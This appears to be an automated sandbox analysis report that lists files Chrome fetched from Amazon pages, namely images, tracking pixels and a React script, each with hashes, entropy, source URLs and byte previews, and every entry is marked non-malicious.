                                                                                                                                                                                                                                                                      SHA-256:22DD9F2E0ACC61FF6F0B92EFB5723D9AB3C8A6D8DD8ADA23DB61DB25C8F7FAA8
                                                                                                                                                                                                                                                                      SHA-512:D7F030B4F2D08845705E3E6C73191B813F4D0291BB3ACCE615E7933E8AAB094103934F6CE2EB40E210049901730040A0CCB10142D1530D8FF6AEBF8F9DFE8DBA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........4.......................................................................}..,Q.._....."?..a.....~mQx.z..v..$......=........|..&_.I.V.-[.....$..DOB.....~.rM...%...I.Hy..].......wv...|..S.%.t...;..rQ.,_......x..V.rz.y.!.B......3.i.n[MUU...M...=.s......W.......`.D...@.qM.s.t:.},...E.=.2;5,`..[f..........[.*N.2s.2W.u.....N..eI'.<:..)......u1.:."u.]..(p.;.}....he.....HfOE!G].*...K..n.C.......F..#yX.-.=...4..iD...8+I'.?...k..%.f.-q.}k.,I.y..-.o....+...1h.H.Cfs./&.f<..}'.3.._.~}....C..e..<........o'4l.E#dH.E..Z.=Y........&`:....Rl{.0..3I...Y.e._.ev.V.@w../..=....}+^C...4_7...z.|.T.x..A.O..iz.....+.......GhfZ..J.b..?z..J.....>u.eV....b...#n.TiffG...|9~e.`.t...B..M.....|..0.h.g..24..t..I....aM.. .4.+.....}.F+"S.#o..,^._..jX...p...v.X..jL{.8(9..L..i..L....z..lEkI_]>..ln..4..C.9.S...n9|.sA.\.|..s
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):28
                                                                                                                                                                                                                                                                      Entropy (8bit):4.066108939837481
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:Q3S1lnyY:QC1lnL
                                                                                                                                                                                                                                                                      MD5:C2123D55130F2FA8031FE9BFFF36E675
                                                                                                                                                                                                                                                                      SHA1:B1F9FA4201BBA320891B92428E08EBDBE97F281A
                                                                                                                                                                                                                                                                      SHA-256:C456CA51EA843B4E09F6102F892EF409440A5C3C3615821B2586EEAD2F680506
                                                                                                                                                                                                                                                                      SHA-512:C962FF1CF2655106BE8456A80B945BFFE9EEFA29224684FA8B68FC8AA0364DADE034FBFF426BF48F8E2C0652F596EF47AFEE2129E40D995CB2B73F1109B13ED9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmsilr5PRTcwRIFDb1LTuESBQ1IOj9B?alt=proto
                                                                                                                                                                                                                                                                      Preview:ChIKBw29S07hGgAKBw1IOj9BGgA=
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 224x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6891
                                                                                                                                                                                                                                                                      Entropy (8bit):7.948079304124011
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Tuj5gLBMHWLwIJ7FVjo/yTOTSphS6DyrIdXYFxQZDPWF32EY3KpR9Aq47MikY/Pg:RLW6DJ7FKSOWpryr6WFm/336DSez3Kih
                                                                                                                                                                                                                                                                      MD5:61CD78ABCEEA9BADD1CBF93383890E89
                                                                                                                                                                                                                                                                      SHA1:8B262DA40AC0ECB2C398ADF185D019646F585AA3
                                                                                                                                                                                                                                                                      SHA-256:A8395389DE4F3772B0E58E7BC084B117FA1EC910F2265AAA1803739DF0A42547
                                                                                                                                                                                                                                                                      SHA-512:3573F304281E59B508E510271340254BB8DA78627C0F60E8E6F629971895D462FC88ABA9F6E7BFBB203E993CD351ABFF28443231B59AAA3112ED780C275B9D93
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/619pZrUnkWL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1..AQqs..."25ar.....#4BSctu........$D.&36RTb...%..Cd..................................................1."QR.23aqA...!#B............?..-r..9r..m.pM..q..2^..ygw..`s.l.....b......"p&.>L9....n.E..^.A.N..G..n......y.M.|...b..|.Yh`q".C.....=.X!.h#...g:...L..6.q........$Rr...5...DX....[....{7a..}...`~R..<.gR.i......Z.7v<Oc..tU.....3v*..`r.>..B.h...S.[iK(|..$..E@.iO.v....R:.....e4.../..P.F..b{..d.....Q..(.~....2...O.U\./..Sh.v..X.4.uv.-.&^...#.wa..?.........L..,....K..9v..{.2..4&......PzZ.Q'e...P.M..y.L|.G.*3.d.0.t....9.`....P..cn.0V.Z..(Pjw`.....t.......}.<....K.......P.Fwe..LF/^....b9c.`l....t[M.+..a.-.......r3g....4c...B...........'.j.ve#l...}..|..`.......V..k9[.3x..<el.1.^...EIT.?.,..P<.]n6......A.n..$..Ph)hD..l.......\.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5599
                                                                                                                                                                                                                                                                      Entropy (8bit):7.847842688166573
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:CG1C45doFIFVqUkF93+4qx5qVtVbNNJeaR8tjIYNB9J1bKTm1EuIMui6Ffgp1ol4:CG045Gizkp85uLJePt+aoMWfgp1ol4
                                                                                                                                                                                                                                                                      MD5:3E6C194E3AE1715C7EC720C867885998
                                                                                                                                                                                                                                                                      SHA1:74AD8FB24CE8BBF569699DB46DF3D9E0F4BD4F55
                                                                                                                                                                                                                                                                      SHA-256:FBEAAF660FA9114F6BA3AD61BF1F1D52DAA9A4CC1A32D24D98B516DBD3CE52AA
                                                                                                                                                                                                                                                                      SHA-512:9DD2EBEBE597A91F1927802610DB34D78A1607A6867D3E5BFCE508E37625F9E1E4AA1C42A188DF2B4CB08D4BABFA166094607F887F3B170CD29C165B98680091
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........9...........................................................................]4.r.V.......Y..6q[y....../.sH.*..3V_.m.vS^F.~;...}.....[.:.C.;".^f..J....b...~.=...z`._..^..E..@E'.5.*..f{....";.,....a....MU...(..V.n........y.#.....a....w.....W.....zF..qZV....J..P.m.u..B..U@M.....w..M..kj....G.%.iyg.+...w.y.....M5.l.....(..!..o..y...H.jC...k..d......../....q]Q ~..|....jP..h....Rz.Pn.K..RV....,.....3..;.....qLR=5.........`S.-.gy........Q......pA.....x..O.>t.v-%M..l...=..&..Iyo$&)[..0-...i...n.p....)...-r`...8$W..0.&.B.0...................................!0.. "12..3@A$%Q...........?.q........>..|......W..^t...I.E..I2.x...CX...CX..W..B......`.e...,&..q"mX8...[..U.,U....0^n.Q..B6.5l.4..H6..vO.N.iN;.b4.......k..O.}R.>{..:.xw"a....'g*.!1D.."*..Hj..../I..(.....G.t....Y.,.....&...dGr...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):137291
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2660240785205366
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:Vi2MVvXHlaAUQ2qNpPMWgxpi4iHenkP3+vja0Vy1YZ:VNtkpSNiHeBr
                                                                                                                                                                                                                                                                      MD5:F7BCB00D4DF41C9C13C7F5283922D26A
                                                                                                                                                                                                                                                                      SHA1:2C7474894226792272947AE47D8198795787CAFE
                                                                                                                                                                                                                                                                      SHA-256:9D161E7989301FC5D63EBE074E0C527BA33CF146AD003BF9D6F3BB1AD30D9518
                                                                                                                                                                                                                                                                      SHA-512:DE504F3E26EE3E6F270D038585207C96BA9BCCFC9B12491199B35C4148D888CBD958B6E64606E75E056F165FE4690EB56C37108DD72B92091BAA5D57EEC597B3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71Q5hfLlYnL.js
                                                                                                                                                                                                                                                                      Preview:/*! For license information please see react-dom.profiling.min.js.LICENSE.txt */.!function(){"use strict";var e,n;e=this,n=function(e,n){function t(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function r(e,n){l(e,n),l(e+"Capture",n)}function l(e,n){for(Ea[e]=n,e=0;e<n.length;e++)Sa.add(n[e])}function a(e,n,t,r,l,a,o){this.acceptsBooleans=2===n||3===n||4===n,this.attributeName=r,this.attributeNamespace=l,this.mustUseProperty=t,this.propertyName=e,this.type=n,this.sanitizeURL=a,this.removeEmptyString=o}function o(e,n,t,r){var l=_a.hasOwnProperty(n)?_a[n]:null;(null!==l?0!==l.type:r||!(2<n.length)||"o"!==n[0]&&"O"!==n[0]||"n"!==n[1]&&"N"!==n[1])&&(function(e,n,t,r){if(null==n||function(e,n,t,r){if(null!==t&&0===t.type)return!1;switch
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):25418
                                                                                                                                                                                                                                                                      Entropy (8bit):7.906627824881822
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:4YNg7gLwvk1MTQ5vF7IndO2lnVmFPR1l3UFtZz+zPUMQk:4YycMvkbb7InE2hO1l3UFtUMk
                                                                                                                                                                                                                                                                      MD5:0EDE8C118B6F5096AD3419D19BE433D9
                                                                                                                                                                                                                                                                      SHA1:842347181E32996C2F559FB0F4BA8DC275AEB8E8
                                                                                                                                                                                                                                                                      SHA-256:33A0DC82CE8301529A7BD7E5ABF6BB215001C3CC4018B7848FD60B3CCAB94F82
                                                                                                                                                                                                                                                                      SHA-512:98C6D6B1CB3CB407DF87BDB0224C1D949EB377F64AD397BC5D310214EEE1F3DC16D770268FE8CFF3B28C97335D6DD622881219C7C40BBD75E97CC3EE69333A40
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):21886
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9430396779644585
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:QmQSvMbCu42YK4kH5xLtfK/x1PIgVCHjODF04Gi9eA49H+zR//zBoR3w/JaHP9MS:QpiMbO24kH5xLCcfCp04GiUH+x9zxavh
                                                                                                                                                                                                                                                                      MD5:3B842963D3087E0456EF11185D7B8C17
                                                                                                                                                                                                                                                                      SHA1:B0A42F9EB45B26B6CA340C73FB205076DEE03177
                                                                                                                                                                                                                                                                      SHA-256:55546FFCB3DB6E848756B5593FC60AD4936824435CFC529BDE66A529106E44F3
                                                                                                                                                                                                                                                                      SHA-512:DD7EBAA73B833EEDF4A4755040633A49ABCA96D11D5545972A221E0EE9E6AD25CBF4E6BB5DE9DADA4A59020086A603B99878F34EE426495E5FA711F2801214CA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X...........................................................................\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.j.6.$.................-.2.-.2..L^.. .bs,./..b..(.b.e.9NS..e.tL.SH.@..........T.x.R;Q.*.7.6.K7..jF..Y.q>...z;:.......g.}.....O.....e.!...mM<...V.%........G..P6... .ii7L..................?..........oV......X...ZK...#....,<...K...w.qdS...Ay..b5.......#......J.../.@x...~ .l.5.zI.>...........Kmut....dD..G....-...u..8.y......m.......l.7ogm...n...T..D.g..m......z~....g....MY$7..!.U.<.P.........z~..O....x.D'..5.XU...~:....~..#..9./d.x...l..~.Y.....9...uc..M.....O....x....`......+K..5..7.p...........[...S.#....m...9..rX,....l...F...a.._b+=...G.W..gY.0m..zh.....E..Pn.?..................Dq..jfek.N....d8.>.dq.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11120
                                                                                                                                                                                                                                                                      Entropy (8bit):7.962642107553172
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:0yvFQ7o6Yh3e9491agGy0fjuMREv/AoZAtOZDHLZvah6d6l5v4FDDFHbXXqEhJ:0yvFQlYhd1ag7WK2Ev/vCIZrZv16l5QZ
                                                                                                                                                                                                                                                                      MD5:75832C9965DEE0F44E31F86F22E90417
                                                                                                                                                                                                                                                                      SHA1:6BB83CBCD6574FF8363EAEBE99CC6E5BCD582993
                                                                                                                                                                                                                                                                      SHA-256:A762D1EBECF60CA7664ADC978C57C533173D616DD9056CE78274F2C1EDB6B9E7
                                                                                                                                                                                                                                                                      SHA-512:243EF43C0E23287CF78C88753907FC4A05A8976B1E0E7DCDF8756A80BE7E7C0D3003C5A5172EA60D5071EECEF92DA265880C2F36C5607BB558188FC67188DB33
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!.1."A.2Qa.q...#BRt...$DSbr......3CT.......%d.....................................................!.1..a"AQ....#q..23BRr...C...............?..(.....*I.(.....*I.(.....5.z.J].1B?.".N.?mZ.....-..3...aI..W.....-..)tV.MkC]..o..b.7.'qZ..d(.[...(.*.u.T/NZ.G....p..B..~,xE^.........h}I...q...}.R.Cm...Q....wsV?l.....D..o....{3HR_..4..tm........79.P....q..%.hv.Q..v{.....z....won.}..wx...d#...\..].j0jv.....).Y..C..8#. .\.?@.B.8........]..d.C.....o.6..$...n.3~.B..4QE3...QRHQE.$.....=..W/.8.[.!G...51.=...io,.6.)......Oh.......'.*TW8j.....!X...._.8_.iM.5........0./....>....t..7.b.=O?..N..z.J.r.."...q.._z........X.?.O.>.(jI.{9.......D.O..`.q.h}...a.K.._G........5.O....5..h...4...-NP~.o.......b..u~...I$.F6.T}.#...5G:>.4.q..:|.H.e\8...CrW...).".e.y
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):81920
                                                                                                                                                                                                                                                                      Entropy (8bit):7.602205667429281
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:8ZedmqANhdjy+pbwlFuvsXCWT9NjJHMbAEPK:8nqChVpbwWcTDjJsbAR
                                                                                                                                                                                                                                                                      MD5:7A2E9E931E795F19C9965B3342B43172
                                                                                                                                                                                                                                                                      SHA1:FC9CE376AFDBC31475FA0E6BB3CD179D7E7B8A05
                                                                                                                                                                                                                                                                      SHA-256:E72D270BF569954B44AA2193E26E1B070C138757853FFA734E476FE46FD22902
                                                                                                                                                                                                                                                                      SHA-512:C50DF0C374E5417D08687BD29B9F32DC826180B416C99F72709B42799DE36984379210CB3B7130BA200C6810B02F40B106BED6C78C7AED96E6C1F7623AE26D4B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......Exif..II*...............4GJP........4=jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:84ca310c-ccfd-40f5-bdc4-78f8db02bd91.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Idnamenjumbf manifestcalgfsha256dhashX ...2p.J.....=..4.<]].+..B'j.R.cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:5DF93826512911EFA366EADDEB8D89B3oclaim_generatorx6Adobe_Photoshop/25.9.1 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversionf25.9.1.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX Ji.....A0x.$...1:..d.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3Dadplacements%3AsfImpression%3A3221523e-c639-400a-a04d-789177f02209%26bb0%3D4763%26pc0%3D65844%26ld0%3D65811%26t0%3DWed%20Aug%2021%202024%2014%3A29%3A45%20GMT-0400%20(Eastern%20Daylight%20Time)%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:65844
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3766
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7570509651513175
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Fvit+C18JhHQwIDh7Chv2DGzQDwRNeqzA:Fvir1uHoDh7akGzQURIq0
                                                                                                                                                                                                                                                                      MD5:D336EA2BC81A9C2A232D3FE1C6EB527A
                                                                                                                                                                                                                                                                      SHA1:5843525703D25C4A794D32F18116B28E736E8D82
                                                                                                                                                                                                                                                                      SHA-256:F118F952DE01D1CE2B68CA2A63AFABA1EA19299274C6A470A3325D3D9F00AEA7
                                                                                                                                                                                                                                                                      SHA-512:15A210BCEEC24F85A6EA75B887FA9BA4B4183EEB0C8DE7EC3F6753AC494A2FAEE2E2407E2589BEBFCFAA71BCB607A6C7DE6E314EA46B5D91FC96AD234FAAB34A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........:.........................................................................b.............z...v.=.l9.Pi.h]..o.:F......b.....@.....}C-. .}........X......L....".X(-\X......>u../....~oX....;...d.....#.Zb7>=.~.p......'........D../..F.........h..3..._..Z..#.R...\,|v.......k...z.s ...^.nf..efd..[..g....i..@........5..w.....7H.,.SF..d.`................P.............................!%E..145DUe.$&06AQVqu..'@FGa.........Pf...."gtv..........?......aEYT.)R..%.....o7.%..6I.V.x........F.(.G...8....A...B6Y...ezr..+.B..a...z...iW.......Z9?.hV|bINa....%d<...K-.d....r...yF.mLfC.H.Cm}.|z...0..m....p..7Z4...).....I.%TH...P.B..%.\G..:8.R..GV..,E......j..&j.....$.\.9<.9..Q.....b.<.....)./ZN..p..<.m.O....2.._.O..!O.z>..%..L..6.i2......P....U.#.|...6...2.1...c..]..!:.U....,.Ek%...h.*..$.Nq{(.h.`$.t.w..0..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):111217
                                                                                                                                                                                                                                                                      Entropy (8bit):7.799995912977319
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:lsfkVfZ1fdPkflXw1Iv/y+QrSLu6XXXXAuHn:OfYdzz+MMXXXXpHn
                                                                                                                                                                                                                                                                      MD5:670EA98AE67886BBBECA3882BACA39AF
                                                                                                                                                                                                                                                                      SHA1:74452D9C64A63C74D59A89E9B102420CC21358A1
                                                                                                                                                                                                                                                                      SHA-256:F8E2DF00B9D96175C9E11BE6695A39450ECEB6BF854E80D361839D46C7D33A81
                                                                                                                                                                                                                                                                      SHA-512:55508B1CABCB81BDEE9EE025C7013626CEA950A32F35DB9AB2FB2A284D3DF7C35E10177F18272C7EFD4E32C39B779156D5BE56AFD9EC1832B731DAEFA72D1EF9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF................................................................#"""#''''''''''..................................................!! !!''''''''''..........."..........5..................................................................................................................................................................X....@......*.P....X.Q(J........P..PJIF'^f/..lx.@...........X....)...@.%.. 6c.3................................................................(.............,...............YBRP.X,RP.....%.. ...P...............!....\L.............(.*RYI@...P..[1.................................................................. ........................J%....(..D.(E.DX....!@.............K(..q3z.b.8.)...............@.J.J ..l..f..........................................................................W...<..>..n5.[|s....w..K.H.2.Y...[.../..n..o..#.....7...~..lG.@......AA(.......P..............................[.s...................Q.@l....................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 278x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):19602
                                                                                                                                                                                                                                                                      Entropy (8bit):7.976187228415165
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:JLS0vX386Qh9AIs1u1deCLZlQqNll+/aOZ7OUENX0QTvWw:VJX386e9AIscjZF0HUPv+w
                                                                                                                                                                                                                                                                      MD5:8E1DD4FB1213C6632084CA3365616E17
                                                                                                                                                                                                                                                                      SHA1:722A587C682579CBC453E95B7C92A5544C341DE8
                                                                                                                                                                                                                                                                      SHA-256:9F30387784BC20BB39D14731EEE5EADD325442055B93EE8DA707A67F0F88DB68
                                                                                                                                                                                                                                                                      SHA-512:B55F2074429490EE2139147FD81FB23C2D83141B050D248D77A1363233C4BEB616F216E0BEB1BC1CCCC2852FE0DCEFB100D1CCB26C9BE78BDB993CD6941B7F02
                                                                                                                                                                                                                                                                      Malicious:false
